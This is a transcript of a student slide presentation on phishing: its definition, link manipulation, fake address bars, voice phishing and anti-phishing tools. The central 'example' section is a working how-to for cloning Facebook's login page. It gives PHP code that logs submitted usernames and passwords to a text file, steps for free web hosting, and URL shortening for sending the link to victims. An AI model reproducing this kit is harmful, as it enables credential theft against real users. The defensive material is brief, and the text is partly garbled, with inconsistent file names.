phishing ppt
DESCRIPTION
Hacking Attack and preventionTRANSCRIPT
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
A PRESENTATION ON
PHISHING
By
Mistry kartik(110413116002)
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
TABLE OF CONTENT :
What is phishing ?
How the phishing works ? Types of phishing attacks.
Example of phishing
Anti-phishing Techniques.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
WHAT IS PHISHING ??
Technique used to steal valuable information such as credit cards numbers ,social security numbers, user IDs and passwords.
Phissing is also known as “BRAND SPOOFING”.
The communication (usually email) directs the user to visit a Website where they are asked to update personal Information,such as passwords and credit card pin and Password , social security , and bank account numbers, that the legitimate organization already has.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
THE SIMPLIFIED STEPS OF PHISHING :
1. A deceptive message is sent from the Phishers to the user.
2. A user provides confidential information to a Phishing Server (normally after some interaction with the server).
3. The Phishers obtains the confidential information from the server.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
HOW PHISHING WORKS ?
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Phishing link takes user to fake web page which looks like genuine.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
TYPES OF PHISHING ATTACKS : Phishers use a wide variety of techniques, with one common thread 1. LINK MANIPULATION
2. WEBSITE FORGERY
3. PHONE PHISHING
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
LINK MANIPULATION
By manipulating the links for example
www.faceb00k.com
instead of
www.facebook.com
Mis-spelled URLs or the use of sub domains are common tricks used by Phishers
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
WEBSITE FORGERY :
The hacker need to Generate duplicate Address Bar using some java Scripts.
Using Java-scripts the original URL is Hidden andthe Duplicate Phisher’s duplicate URL is displayedin the address bar.
Using modified Address bar User Thinks That the URL is a Genuine URL and user Provides some
private informations Like Login-ID ,passwords , Pin-no. to The Attacker.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Above is the Website of the citi bank having fake Address bar.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
PHONE PHISHING
Not All phishing Attacks Require Fake Website .
Some message is Claimed to Bank user Telling User That There is a Some Problem With Phone Account And advised to dial some number which Looks like owned by bank but actualy It is owned by Attackers.
The attackers use Fake Caller ID to call the user so user thins that the Call is From trusted organization.
The User Dials That number And recorded message played and tells User To enter Bank Account number and password .
Phone Phishing is also refered as Voice phishing or we can say “VISHING “
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
EXAMPLE OF PHISHING ATTACKS
WWW.FACEBOOK.COM
Step 1:
Go to facebook.com
Right click on the white space of the front page. Select "View Page source".Copy the code to Notepad.
OR
Click View source From The Toolbar.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
After clicking on the source You will find HTML code of The Facebook.comU just need to copy that code into the notepad File.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Step2: Now find (Press ctrl +f) for "action=" in that code.You fill find the code like this:
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
By Default in Code The Action= Redirects us to the original facebook login page. U will find like
Action= “ https://www.facebook.com/login.php “
To Divert the Flow of That Data From original Facebook site to Hacker. U have to redirect the action to another file let us say
Action=“next.php”
Next.php is another file which is created by the hacker to Store the user id and passwords submited by a Victim.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
<?phpheader("Location: http://www.Facebook.com/login.php ");$handle = fopen("passwords.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
save this file as "next.php".
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index . html, next.php ,passwords.txt) in any of domain using free Web hosting site.
There are so many free web hosting sites which provides free domain to the user. Some free webhosting sites are :
000webhost.comFreehostingforu.com360gb.comHost1free.com
EASY STEPS TO CREATE FREE WEB HOSTING SITE
Step 1 :
Redirect to any of the free web hosting site. And Sign-up.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Step 2 :
After completing the Sign-up process u will get domain and password Through Email. Log-in using That Email Id and passwords.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Step 3 :
After Login You will get the Control panel for your domain.
In control panel click on File manager opton and upload all the 3 filesWhich is required for phishing site.
index.php : For loading Facebook Login page
next.php : To divert information to hacker when user clicks on Login button
password.php : For storing the ID and passwords of Victim.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
ne
Now you are done with phishing the facebook site. You just need to create a tiny url of your free hosting website domain using www.tinyurl.com .
You just need to copy and paste the tiny URL link to the victim.
WWW.CRUSHBITS.COM
Fraud Sites Like www.crushbits.com is used to make peoples fool or Used to play prank with friends. Below is the crushbits sign-up Page.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
After completing Sign-up process u will get a URL to Your Given Email ID.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
When You Give This URL To your Friends using sms or email or Chatbox they will be Redirected to The Following page.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
Phishing Site will Ask User for Crush And however user enters theCrush however user enters the crush and clicks on ”Click to find out” button They will get display that You have been Fooled.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
However Attacker logins into their account they will notified about All the victims with their crushes.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
ANTI PHISHING TECHNIQUES
Anti phishing techniques are techniques to prevent phishing attacks.
The anti phishing techniques can in general be divided into three categories.
1. SPAM FILTERS
2. ANTI-PHISHING TOOL BARS AND
3. PASSWORD PROTECTION MECHANISM
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
ADVANTAGES OF ANTI-PHISHING :
Protect you from Phishing attacks.
When a Phishing website or phishing email appears it will informs to the user.
Some Anti-Phishing software's also allows seeing the
hosting location and Risk Rating of every site you visit.
DISADVANTAGES OF ANTI-PHISHING :
No single technology will completely stop phishing. So Phishing attacks can not be completely stopped
Even Anti-Phishing software's should be upgraded with respect to the Phishing attacks.
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
THANK YOU